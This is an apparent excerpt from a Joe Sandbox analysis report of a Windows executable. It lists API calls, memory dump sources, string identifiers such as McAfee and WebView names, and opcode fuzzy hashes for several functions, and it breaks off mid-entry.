                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$759783FreeShowStringUpdate
                                • String ID: \McAfee\MSSPRes\
                                • API String ID: 2726993354-1001217308
                                • Opcode ID: 7ec9169ba3607473b62ce2f509328a9d0a795c55153cb92bf4c8796288b1ba7b
                                • Instruction ID: f33fbf144ae598b20e141acb5dcc3605e41bf27f7a3b9fd58f57f48eb5ab6fbf
                                • Opcode Fuzzy Hash: 7ec9169ba3607473b62ce2f509328a9d0a795c55153cb92bf4c8796288b1ba7b
                                • Instruction Fuzzy Hash: 1381F3B1E00248EFDB01DFA4DC49BAFBBB5EF44304F148119EA05E7290E7B99A45CB65
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E70AE
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E7140
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy___std_exception_destroy
                                • String ID: 0q>$@ >$@ >
                                • API String ID: 2970364248-2536544690
                                • Opcode ID: 9f082496251a2a1214bedcf1fca7a80fad79d0c672eb25d47762aed686480c1d
                                • Instruction ID: 4be5c755bc5c0f73fdcc95a7bf7c486c96e925e116adf58b58b3166e996c0156
                                • Opcode Fuzzy Hash: 9f082496251a2a1214bedcf1fca7a80fad79d0c672eb25d47762aed686480c1d
                                • Instruction Fuzzy Hash: 5171D171E002589FDF05DF99D881ADDFBB4FF48310F54822EE804A7282EB75A944CBA5
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 004188DA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff$gfff$gfff
                                • API String ID: 118556049-2178600047
                                • Opcode ID: 4d7262547963615829dbf36076158be309bc6ffa61fcb69a0a20be55161f3f32
                                • Instruction ID: 7cdaf9acf6d8c5ab54670419f7ec040f8a9f3c16075b6cf6f2fce0729f454ef2
                                • Opcode Fuzzy Hash: 4d7262547963615829dbf36076158be309bc6ffa61fcb69a0a20be55161f3f32
                                • Instruction Fuzzy Hash: 0A71C2B1A006098FDB08DF59D950AAEB7B1FF88304F24822EE406DB791DB35F951CB95
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00413D9B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff$gfff$gfff
                                • API String ID: 118556049-2178600047
                                • Opcode ID: d0286d032bb7a2b3f97adb7a64c81fffb3093487f5b2ec60185f946c08a12ee6
                                • Instruction ID: bd563ef2f8a41af83d2e9c645c13c48e5453d85c61890b27fc4bb0cd522a53bf
                                • Opcode Fuzzy Hash: d0286d032bb7a2b3f97adb7a64c81fffb3093487f5b2ec60185f946c08a12ee6
                                • Instruction Fuzzy Hash: 0361E6B1A005068BD70CDF2DD995AAAB7B1FF88304F14822EE915DB341EB35FA91C785
                                APIs
                                • RtlUnicodeToUTF8N.NTDLL(?,00002000,00000000,?,?), ref: 00409E81
                                • RtlUnicodeToUTF8N.NTDLL(?,00002000,00000000,?,?), ref: 00409EED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unicode
                                • String ID: <{!truncated!}>$`F$`F
                                • API String ID: 470584828-3795525384
                                • Opcode ID: 0e467a81dbf682c9254cc2c5aca90d405ba1d9c6bba62a64f992909b970830cd
                                • Instruction ID: ee72081003e0e917e5d4261da7772dea1c5eeeeb5e898e48badfe415b05879fd
                                • Opcode Fuzzy Hash: 0e467a81dbf682c9254cc2c5aca90d405ba1d9c6bba62a64f992909b970830cd
                                • Instruction Fuzzy Hash: 5B517AB0E042199BEF14CFA8C9457EEBBB4EB48314F24816AE811B73C2D7795D448B99
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F3B9B
                                • SysAllocString.OLEAUT32(ComponentHost), ref: 003F3C0F
                                • VariantClear.OLEAUT32(?), ref: 003F3C48
                                • _com_issue_error.COMSUPP ref: 003F3CA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$AllocClearInitString_com_issue_error
                                • String ID: ComponentHost
                                • API String ID: 1237638183-3610559101
                                • Opcode ID: ace70aeb85330e516d0da698db3344a9e1a35e439cf2979af6b1ed0db432e0d7
                                • Instruction ID: 9d5f04b1b00ed6a2f15a151ac3522d0db1919fbf0d9f8f2b6a8e6023aa2de4be
                                • Opcode Fuzzy Hash: ace70aeb85330e516d0da698db3344a9e1a35e439cf2979af6b1ed0db432e0d7
                                • Instruction Fuzzy Hash: 0E51D674E04348DFDB11DFA8CC45BAEB7B8FF09714F10826AEA05AB281E774A940C795
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                  • Part of subcall function 003F9ED0: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 003F9F93
                                • GetCurrentThreadId.KERNEL32 ref: 003F6FE6
                                • SysFreeString.OLEAUT32(?), ref: 003F7017
                                • SysFreeString.OLEAUT32(?), ref: 003F7021
                                • SysFreeString.OLEAUT32(?), ref: 003F702B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentMtx_init_in_situThread
                                • String ID: signal_event
                                • API String ID: 3845081946-4093753797
                                • Opcode ID: 7641d2c59ce0bd4fa6bb17bc29474badae18cf62fa39bef3668b60e52370e79c
                                • Instruction ID: 14866e5d540d152afdd2eb9e2e39cca649ad5f27cd53766b36a14513503a382e
                                • Opcode Fuzzy Hash: 7641d2c59ce0bd4fa6bb17bc29474badae18cf62fa39bef3668b60e52370e79c
                                • Instruction Fuzzy Hash: E6416075E0421D9BCF15DFA8D981AAEBBF9FF08310F14416AE901AB341DB35AD00CBA0
                                APIs
                                • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,?,?,?,00000000,004614D0,?), ref: 003E5E89
                                • GetLastError.KERNEL32 ref: 003E5E95
                                • CloseHandle.KERNEL32(00000000), ref: 003E5F00
                                • CloseHandle.KERNEL32(00000000), ref: 003E5F3B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseHandle$ErrorLastOpenSemaphore
                                • String ID: _p0
                                • API String ID: 3583359621-2437413317
                                • Opcode ID: bce2ac7c8ef68dc8dbf41597dedccee11b88a51b8135992db707ad45b1177387
                                • Instruction ID: 39cd33be2e6472e59df7f9e7a33d8aa5df94de1eaf0bec04b714e7ec3ce78ec3
                                • Opcode Fuzzy Hash: bce2ac7c8ef68dc8dbf41597dedccee11b88a51b8135992db707ad45b1177387
                                • Instruction Fuzzy Hash: D13104752146549BD716EF26EC45BAB73EAEFC9310F10472CF8088B2C1EB309E01C6A6
                                APIs
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00404C32
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: 0q>$@ >$`I@$directory_iterator::operator++
                                • API String ID: 3109751735-3075673613
                                • Opcode ID: 1545a5334c7f1759df6d2bee6d4cb18745119cf8f6aaada5e1e74260f55bc2d3
                                • Instruction ID: 471c2aebfbd849508c93e2fd0bced2b2833431948058e6adf8d2a67cf58fbb36
                                • Opcode Fuzzy Hash: 1545a5334c7f1759df6d2bee6d4cb18745119cf8f6aaada5e1e74260f55bc2d3
                                • Instruction Fuzzy Hash: CD317EB1900608EFC710DF55DD41B86FBFCFB19710F50866AE915A3681EBB4BA08CBA4
                                APIs
                                • ___tlregdtor.LIBCMT ref: 00421479
                                • SetFilePointer.KERNEL32(?,?,00000000,00000001,A05DD77D,?,?,0043B3A0,000000FF), ref: 004214B1
                                • GetLastError.KERNEL32(?,?,0043B3A0,000000FF), ref: 004214D1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 3194831421-4220718512
                                • Opcode ID: 080f3b2184b3006a4553958c9f1504cdf603a48b63e34361caca2850cc2468ad
                                • Instruction ID: fc4eefdf920fa33f7396e2d6d7ac44169258fda274b1a28bd8d3ef3a7f0a6a85
                                • Opcode Fuzzy Hash: 080f3b2184b3006a4553958c9f1504cdf603a48b63e34361caca2850cc2468ad
                                • Instruction Fuzzy Hash: 5D319F71A04B64EFD721DF24D800BA7B7E4FB05B20F504A2EE96F877A0D77964008B96
                                APIs
                                • ___tlregdtor.LIBCMT ref: 0042131A
                                • ReadFile.KERNEL32(?,?,00000000,?,00000000,A05DD77D,?,?,?,0043A5D0,000000FF), ref: 00421342
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileRead___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 3805497070-4220718512
                                • Opcode ID: 0bdf14da2e6ed0f9d3f564b47db03110a574a4e1ee80a7b244e903eea2bdd58b
                                • Instruction ID: 3a1c4b119da3ef676939bc5e4e5c840181d89d72c24619520aea99cd63b591c4
                                • Opcode Fuzzy Hash: 0bdf14da2e6ed0f9d3f564b47db03110a574a4e1ee80a7b244e903eea2bdd58b
                                • Instruction Fuzzy Hash: 7431A071A04B54EFE721CF64D801B9BB7F4FB08710F004A6EE86A87790DBB96400CB96
                                APIs
                                • QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D,?,00000000,?,0043D290,000000FF,?,0040DE6F,?), ref: 0040DEBC
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040DEEF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: 0D$trust$update_cache
                                • API String ID: 2902542638-46904128
                                • Opcode ID: 9af4183fd37b0497d985f96bd6b8bca3cd72bd141d521e451e4744f90b2499d5
                                • Instruction ID: 951ad9142fb281c5aedca00f5361b68a1597a5c826cac8b65b48a34ab7a41dca
                                • Opcode Fuzzy Hash: 9af4183fd37b0497d985f96bd6b8bca3cd72bd141d521e451e4744f90b2499d5
                                • Instruction Fuzzy Hash: 2E217C75A00608AFD714DFA9DC85FABBBF8FB4D710F10466AF905A7290D775A800CB94
                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00428CB3,00000000,00442280,?,00000000,?,00428D65,00000002,FlsGetValue,00442278,00442280,00000000), ref: 00428C82
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: api-ms-
                                • API String ID: 3664257935-2084034818
                                • Opcode ID: f5ca089392f4164d36b75d90487cebb2fb09a6c177f3b12d24c2e35dbdbb7747
                                • Instruction ID: cf790e74713325d114bbdac416e9a3871f6a1129ca0435b6489cf9e5f64edd11
                                • Opcode Fuzzy Hash: f5ca089392f4164d36b75d90487cebb2fb09a6c177f3b12d24c2e35dbdbb7747
                                • Instruction Fuzzy Hash: 2411C435B43230ABDB224B69AC4575E33549F02760F640166FA05A7380DB78ED0086ED
                                APIs
                                • FindWindowExW.USER32(00000000,00000000,#32770,00000000), ref: 003F2A2B
                                • GetPropW.USER32(00000000,WebViewContainerAppName), ref: 003F2A39
                                • GlobalGetAtomNameW.KERNEL32(00000000,?,00000104), ref: 003F2A50
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomFindGlobalNamePropWindow
                                • String ID: #32770$WebViewContainerAppName
                                • API String ID: 2291018682-3746687551
                                • Opcode ID: 624adc244acf461daf36f7193796e78c0c8102e41d7a58b40ad43cc0cfc89a00
                                • Instruction ID: 04566f68faa3edcd623203f46783239a67d24a9ea97ce79e419a05980410b0f1
                                • Opcode Fuzzy Hash: 624adc244acf461daf36f7193796e78c0c8102e41d7a58b40ad43cc0cfc89a00
                                • Instruction Fuzzy Hash: D2012B36B40218A7DA21EBA6AC4AFABB398EF55711F51016AFE04DB1C1ED709D1483A4
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A05DD77D,?,?,00000000,0043A5B0,000000FF,?,0042EC3A,00000002,eB,0042EC0E,eB), ref: 0042EC9C
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042ECAE
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,0043A5B0,000000FF,?,0042EC3A,00000002,eB,0042EC0E,eB), ref: 0042ECD0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: 0977ad62dc4601cc6e690d0c2fdd558438532dab19dbeb08c332b56190597e84
                                • Instruction ID: 83d070c1dc2948f266ea48502ee25f0f024d050a23e71bd8985b8323ecf34afa
                                • Opcode Fuzzy Hash: 0977ad62dc4601cc6e690d0c2fdd558438532dab19dbeb08c332b56190597e84
                                • Instruction Fuzzy Hash: 2301A235A00629EFDB119F92DC05BAFBBB8FB05B11F000536F911A23D0DBB99910CA98
                                APIs
                                • GlobalDeleteAtom.KERNEL32(?), ref: 003F29A9
                                • GlobalAddAtomW.KERNEL32(00000000), ref: 003F29B2
                                • GetLastError.KERNEL32 ref: 003F29C2
                                Strings
                                • WebViewContainerAppName, xrefs: 003F29DC
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
